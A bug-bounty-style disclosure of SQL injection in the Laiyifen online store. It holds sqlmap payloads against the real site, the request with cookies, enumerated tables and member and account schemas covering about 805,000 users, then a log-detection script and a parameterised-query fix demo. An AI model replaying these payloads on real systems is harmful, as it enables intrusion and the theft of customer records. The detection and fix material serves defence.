
SQL injection in the Laiyifen (来伊份) official online store could expose 800K+ user records

2015-01-03 13:35

Injection point (the asterisk marks the injected position; it is the numeric page segment of a rewritten URL path, not a query-string parameter):

Code block:
GET /index.php/article-guanyuwomen-lists-1*.html HTTP/1.1

Referer: http://www.laiyifen.com:80/

Cookie: vary=d77f798a56ce90753573fc70c883ad591a94ee60638487365167a950e7783a9a; laiyifen_cookie=536871690.20480.0000; s=1e8737f4e245da0cab3df00d44c7437d; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1415515310

Host: www.laiyifen.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*

Proof of vulnerability (sqlmap output):

Code block:
sqlmap identified the following injection points with a total of 235 HTTP(s) requests:

---

Place: URI

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html

---



current user: 'laiyifendb@10.3.%.%'



current database: 'laiyifendb'




available databases [3]:

[*] information_schema

[*] laiyifendb

[*] test




Database: laiyifendb

[176 tables]

+-----------------------------------------+

| app_default_info |

| awardlist |

| awardlist_copy |

| collect_shop |

| ds_0303_add |

| ds_0303_payment |

| ds_0303_ptype |

| ds_0303_rpcpoll |

| ds_ectools_analysis_logs |

| ds_ectools_analysis_logs_2 |

| ds_guajian_1 |

| luck_log |

| luck_log_mobile |

| member_lucknum |

| mobile_promotion_goods |

| moblie_luck_num |

| sdb_aftersales_return_product |

| sdb_authenticator_clients |

| sdb_authenticator_logs |

| sdb_authenticator_requestlist |

| sdb_b2c_bcompany |

| sdb_b2c_brand |

| sdb_b2c_cart |

| sdb_b2c_cart_objects |

| sdb_b2c_comment_goods_point |

| sdb_b2c_comment_goods_type |

| sdb_b2c_counter |

| sdb_b2c_counter_attach |

| sdb_b2c_coupons |

| sdb_b2c_delivery |

| sdb_b2c_delivery_items |

| sdb_b2c_dly_h_area |

| sdb_b2c_dlycorp |

| sdb_b2c_dlytype |

| sdb_b2c_ecpool |

| sdb_b2c_ecpool_mobile |

| sdb_b2c_excard_rule |

| sdb_b2c_excard_used |

| sdb_b2c_fbtad |

| sdb_b2c_goods |

| sdb_b2c_goods_cat |

| sdb_b2c_goods_keywords |

| sdb_b2c_goods_lv_price |

| sdb_b2c_goods_promotion_ref |

| sdb_b2c_goods_rate |

| sdb_b2c_goods_spec_index |

| sdb_b2c_goods_type |

| sdb_b2c_goods_type_props |

| sdb_b2c_goods_type_props_value |

| sdb_b2c_goods_type_spec |

| sdb_b2c_goods_virtual_cat |

| sdb_b2c_history_orders |

| sdb_b2c_history_products |

| sdb_b2c_huodong_log |

| sdb_b2c_huodongda |

| sdb_b2c_jiang |

| sdb_b2c_jiang_huodong |

| sdb_b2c_jiang_log |

| sdb_b2c_jiang_members |

| sdb_b2c_lulu_card |

| sdb_b2c_member_addrs |

| sdb_b2c_member_advance |

| sdb_b2c_member_comments |

| sdb_b2c_member_coupon |

| sdb_b2c_member_goods |

| sdb_b2c_member_lv |

| sdb_b2c_member_msg |

| sdb_b2c_member_point |

| sdb_b2c_member_pwdlog |

| sdb_b2c_member_systmpl |

| sdb_b2c_members |

| sdb_b2c_meng_buy_1 |

| sdb_b2c_meng_good_gift |

| sdb_b2c_meng_luck_reg |

| sdb_b2c_meng_send |

| sdb_b2c_order_coupon_user |

| sdb_b2c_order_delivery |

| sdb_b2c_order_items |

| sdb_b2c_order_log |

| sdb_b2c_order_objects |

| sdb_b2c_order_pmt |

| sdb_b2c_orders |

| sdb_b2c_products |

| sdb_b2c_recharge_log |

| sdb_b2c_reship |

| sdb_b2c_reship_items |

| sdb_b2c_sales_baifendian |

| sdb_b2c_sales_bangdingsp |

| sdb_b2c_sales_freeShipping |

| sdb_b2c_sales_rule_goods |

| sdb_b2c_sales_rule_order |

| sdb_b2c_sell_logs |

| sdb_b2c_shop |

| sdb_b2c_single |

| sdb_b2c_spec_values |

| sdb_b2c_specification |

| sdb_b2c_type_brand |

| sdb_b2copenapi_api_fail |

| sdb_b2copenapi_api_log |

| sdb_b2copenapi_api_log_copy |

| sdb_b2copenapi_api_mobile_logs |

| sdb_b2copenapi_request_shops |

| sdb_base_app_content |

| sdb_base_apps |

| sdb_base_cache_expires |

| sdb_base_files |

| sdb_base_kvstore |

| sdb_base_network |

| sdb_base_queue |

| sdb_base_rpcnotify |

| sdb_base_rpcpoll |

| sdb_base_task |

| sdb_content_article_bodys |

| sdb_content_article_indexs |

| sdb_content_article_nodes |

| sdb_couponlog_order_coupon_ref |

| sdb_couponlog_order_coupon_user |

| sdb_dbeav_meta_register |

| sdb_dbeav_meta_value_datetime |

| sdb_dbeav_meta_value_decimal |

| sdb_dbeav_meta_value_int |

| sdb_dbeav_meta_value_longtext |

| sdb_dbeav_meta_value_text |

| sdb_dbeav_meta_value_varchar |

| sdb_dbeav_recycle |

| sdb_desktop_filter |

| sdb_desktop_flow |

| sdb_desktop_hasrole |

| sdb_desktop_menus |

| sdb_desktop_recycle |

| sdb_desktop_role_flow |

| sdb_desktop_roles |

| sdb_desktop_tag |

| sdb_desktop_tag_rel |

| sdb_desktop_user_flow |

| sdb_desktop_users |

| sdb_ectools_analysis |

| sdb_ectools_analysis_logs |

| sdb_ectools_currency |

| sdb_ectools_order_bills |

| sdb_ectools_payments |

| sdb_ectools_refunds |

| sdb_ectools_regions |

| sdb_gift_cat |

| sdb_gift_ref |

| sdb_giftpackage_giftpackage |

| sdb_giftpackage_order_ref |

| sdb_image_image |

| sdb_image_image_attach |

| sdb_operatorlogmanage_logs |

| sdb_operatorlogmanage_register |

| sdb_pam_account |

| sdb_pam_auth |

| sdb_pam_log |

| sdb_pointprofessional_member_point_task |

| sdb_recommended_goods |

| sdb_recommended_goods_period |

| sdb_search_search |

| sdb_site_explorers |

| sdb_site_link |

| sdb_site_menus |

| sdb_site_modules |

| sdb_site_route_statics |

| sdb_site_seo |

| sdb_site_themes |

| sdb_site_themes_tmpl |

| sdb_site_widgets |

| sdb_site_widgets_instance |

| sdb_site_widgets_proinstance |

| sdb_timedbuy_objitems |

| shoplist |

| swjiang_contect |

| swjiang_contect_copy |

| tbasarea |

| tbaschildarea |

| tbasthirdarea |

+-----------------------------------------+



Code block:
Database: laiyifendb

Table: sdb_pam_account

[9 columns]

+----------------+-----------------------+

| Column | Type |

+----------------+-----------------------+

| account_id | mediumint(8) unsigned |

| account_type | varchar(30) |

| createtime | int(10) unsigned |

| disabled | enum('true','false') |

| hmlogin | enum('false','true') |

| hmupdate | enum('0','1') |

| login_name | varchar(100) |

| login_password | varchar(32) |

| openlogin | varchar(60) |

+----------------+-----------------------+




Database: laiyifendb

+-----------------+---------+

| Table | Entries |

+-----------------+---------+

| sdb_pam_account | 805856 |

+-----------------+---------+




Database: laiyifendb

Table: sdb_b2c_members

[70 columns]

+----------------+-----------------------+

| Column | Type |

+----------------+-----------------------+

| addon | longtext |

| addr | varchar(255) |

| advance | decimal(20,3) |

| advance_freeze | decimal(20,3) |

| anyolife_uname | varchar(100) |

| area | varchar(255) |

| b_day | tinyint(3) unsigned |

| b_month | tinyint(3) unsigned |

| b_year | smallint(5) unsigned |

| bind_time | int(10) unsigned |

| biz_money | decimal(20,3) |

| card_no | varchar(20) |

| card_type | varchar(45) |

| cert_no | varchar(100) |

| cert_type | varchar(200) |

| cur | varchar(20) |

| custom | longtext |

| disabled | enum('true','false') |

| education | varchar(45) |

| email | varchar(200) |

| end_date | int(10) unsigned |

| experience | int(10) |

| family_mem | varchar(45) |

| fav_tags | longtext |

| firstname | varchar(50) |

| foreign_id | varchar(255) |

| interest | longtext |

| is_card | enum('0','1') |

| is_upload | enum('0','1') |

| job | varchar(200) |

| lang | varchar(20) |

| last_loginip | varchar(16) |

| last_logintime | int(10) unsigned |

| lastname | varchar(50) |

| login_count | int(11) |

| login_source | varchar(45) |

| member_id | mediumint(8) unsigned |

| member_lv_id | mediumint(8) unsigned |

| member_refer | varchar(50) |

| mobile | varchar(30) |

| month_income | varchar(45) |

| name | varchar(50) |

| nation | varchar(45) |

| order_num | mediumint(8) unsigned |

| pay_time | mediumint(8) unsigned |

| point | int(10) |

| point_freeze | mediumint(8) unsigned |

| point_history | mediumint(8) unsigned |

| refer_id | varchar(50) |

| refer_url | varchar(200) |

| reg_ip | varchar(16) |

| reg_source | varchar(45) |

| regtime | int(10) unsigned |

| remark | text |

| remark_type | varchar(2) |

| score_rate | decimal(5,3) |

| sex | enum('0','1','2') |

| state | tinyint(1) |

| sum_pointtotal | decimal(20,3) |

| tel | varchar(30) |

| unreadmsg | smallint(5) unsigned |

| use_total | decimal(20,3) |

| vipapply_no | varchar(45) |

| vipapply_time | int(10) unsigned |

| vipcard_no | varchar(45) |

| vipcard_pwd | varchar(45) |

| vipinfo_no | varchar(20) |

| vocation | varchar(50) |

| wedlock | enum('0','1') |

| zip | varchar(20) |

+----------------+-----------------------+




Database: laiyifendb

+-----------------+---------+

| Table | Entries |

+-----------------+---------+

| sdb_b2c_members | 805876 |

+-----------------+---------+





I won't dump the actual data.
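The three payload families in the sqlmap output above (boolean tautology after a quote break, the FLOOR(RAND(0)*2) GROUP BY error trick against INFORMATION_SCHEMA, and SLEEP()) leave a recognisable trail in the web server's access log. The script below is an added example, not part of the original report: it decodes the request path from constructed common-log-format lines (the sample lines, client addresses and timestamps are made up for the demo; only the payload shapes come from the report) and flags each indicator, then groups the indicators per client so that one source hitting several techniques in a short window stands out as a scanner rather than a stray user.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the report). The request paths reuse the
# payload shapes sqlmap reported, percent-encoded as a client would send them.
SAMPLE_LOG = """\
10.3.1.20 - - [03/Jan/2015:13:30:01 +0800] "GET /index.php/article-guanyuwomen-lists-1.html HTTP/1.1" 200 8123
10.3.1.21 - - [03/Jan/2015:13:31:12 +0800] "GET /index.php/article-guanyuwomen-lists-1%22%20AND%203372%3D3372%20AND%20%22GBOg%22%3D%22GBOg.html HTTP/1.1" 200 8123
10.3.1.21 - - [03/Jan/2015:13:31:13 +0800] "GET /index.php/article-guanyuwomen-lists-1%22%20AND%203372%3D3373%20AND%20%22GBOg%22%3D%22GBOg.html HTTP/1.1" 200 5210
10.3.1.21 - - [03/Jan/2015:13:31:40 +0800] "GET /index.php/article-guanyuwomen-lists-1%22%20AND%20(SELECT%209648%20FROM(SELECT%20COUNT(*),CONCAT(0x3a7374703a,(SELECT%20(CASE%20WHEN%20(9648%3D9648)%20THEN%201%20ELSE%200%20END)),0x3a656f733a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20%22RgGC%22%3D%22RgGC.html HTTP/1.1" 500 1187
10.3.1.21 - - [03/Jan/2015:13:32:05 +0800] "GET /index.php/article-guanyuwomen-lists-1%22%20AND%20SLEEP(5)%20AND%20%22iUWY%22%3D%22iUWY.html HTTP/1.1" 200 8123
10.3.1.22 - - [03/Jan/2015:13:33:00 +0800] "GET /index.php/article-guanyuwomen-lists-2.html HTTP/1.1" 200 7990
"""

# Common log format: client, ident, user, [timestamp], "METHOD path PROTO", status, size.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# One indicator per payload family seen in the sqlmap output. Order matters only
# for the order in which hits are reported.
INDICATORS = {
    "quote_break": re.compile(r"""["']\s*(and|or)\s""", re.I),        # 1" AND ...
    "tautology": re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.I),  # AND 3372=3372
    "error_based": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "schema_probe": re.compile(r"\binformation_schema\b", re.I),
    "time_based": re.compile(r"\bsleep\s*\(\s*\d+(\.\d+)?\s*\)", re.I),
}


def decode_path(path):
    """Percent-decode until stable so double-encoded payloads are normalised too."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    return path


def scan_logs(text):
    """Return one hit per log line whose decoded path matches any indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = decode_path(m.group("path"))
        found = [name for name, rx in INDICATORS.items() if rx.search(path)]
        if found:
            hits.append({
                "client": m.group("client"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "indicators": found,
                "path": path,
            })
    return hits


def summarise(hits):
    """Collapse hits to the set of techniques seen per client; several distinct
    techniques from one address is the sqlmap fingerprint."""
    by_client = {}
    for h in hits:
        by_client.setdefault(h["client"], set()).update(h["indicators"])
    return {client: sorted(names) for client, names in by_client.items()}


if __name__ == "__main__":
    for h in scan_logs(SAMPLE_LOG):
        print(h["ts"], h["client"], h["status"], h["indicators"])
    print(summarise(SAMPLE_LOG and scan_logs(SAMPLE_LOG)))
```

The quote-break rule is the noisy one (it fires on both the true and the false branch of the boolean probe, which is what you want, since the false branch carries no tautology), while the FLOOR/RAND and SLEEP rules are close to zero-false-positive on a shop front end. Alert on the per-client summary rather than on single lines.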

Recommended fix:

Do not rely on input filtering alone. The page number in the rewritten route (the `1` in `lists-1.html`) should be cast to an integer before it reaches the data layer, and the query should bind it as a parameter (prepared statement) instead of concatenating it into a quoted string literal; the sqlmap payloads above work precisely because a `"` in the path closes that literal. Separately, `sdb_pam_account.login_password` is a `varchar(32)`, the width of a hex-encoded MD5 digest. Whether the stored values are unsalted digests is an inference from the column width and is not confirmed on this page, but if they are, a dump of the 805,856-row table would hand an attacker directly crackable credentials, so password storage should be reviewed together with the injection fix.
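To make the fix concrete, here is an added example (not code from the report or from the store's own application, whose source is not on the page) that simulates the route described at the top: a `/index.php/article-<node>-lists-<page>.html` path is split, the page segment is dropped into a quoted SQL literal, and the report's boolean payload flips the result; the hardened version casts the segment to an integer and binds both values as parameters. The table and its rows are constructed for the demo. One adaptation: MySQL accepts `"` as a string delimiter in its default sql_mode, which is why the report's payload uses double quotes, but SQLite's handling of double-quoted strings varies between builds, so the simulated query and the payload use single quotes instead.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the article-list table; the real schema is not on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article_nodes (node_id INTEGER, node_name TEXT, title TEXT)")
    conn.executemany(
        "INSERT INTO article_nodes VALUES (?, ?, ?)",
        [(1, "guanyuwomen", "About us"), (2, "guanyuwomen", "Contact"), (3, "news", "Latest news")],
    )
    return conn


# Route shape implied by the report's injection point: node name, then 'lists-<page>.html'.
ROUTE = re.compile(r"^/index\.php/article-([^-/]+)-lists-(.+)\.html$")


def parse_route(path):
    """Split '/index.php/article-<node>-lists-<page>.html' into (node, page).
    The '.html' suffix is stripped and the page segment is taken verbatim, which
    is how a payload placed there ends up inside the SQL string literal."""
    m = ROUTE.match(unquote(path))
    if not m:
        raise ValueError("unrecognised route")
    return m.group(1), m.group(2)


def vulnerable_lookup(conn, path):
    """'Before' version: the page segment is concatenated into a quoted literal.
    Single quotes are used here because SQLite does not reliably treat
    double-quoted text as a string the way MySQL does."""
    node, page = parse_route(path)
    sql = f"SELECT node_id FROM article_nodes WHERE node_name='{node}' AND node_id='{page}'"
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(conn, path):
    """'After' version: the page segment must be a non-negative integer, and both
    values are bound as parameters so the SQL text never changes with the input."""
    node, page = parse_route(path)
    if not page.isdigit():
        raise ValueError("page must be a non-negative integer")
    rows = conn.execute(
        "SELECT node_id FROM article_nodes WHERE node_name=? AND node_id=?",
        (node, int(page)),
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    normal = "/index.php/article-guanyuwomen-lists-1.html"
    # The report's boolean probe with quotes adapted for SQLite (true and false branch).
    true_probe = "/index.php/article-guanyuwomen-lists-1' AND 3372=3372 AND 'GBOg'='GBOg.html"
    false_probe = "/index.php/article-guanyuwomen-lists-1' AND 3372=3373 AND 'GBOg'='GBOg.html"
    print(vulnerable_lookup(db, normal))       # [1]
    print(vulnerable_lookup(db, true_probe))   # [1]  -> same page as the clean request
    print(vulnerable_lookup(db, false_probe))  # []   -> differs, so the condition leaks
    print(hardened_lookup(db, normal))         # [1]
    try:
        hardened_lookup(db, true_probe)
    except ValueError as exc:
        print("rejected:", exc)
```

The observable difference between the true and false probes is exactly what sqlmap's boolean-based blind technique measures; once the segment is an integer bound through a placeholder, the probe is refused before any SQL is built, and even a string-typed parameter would be passed as data rather than parsed as SQL.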

Source: www.wooyun.org/bugs/wooyun-2015-083795

Views: 128082 | Comments: 0 | Tags: injection
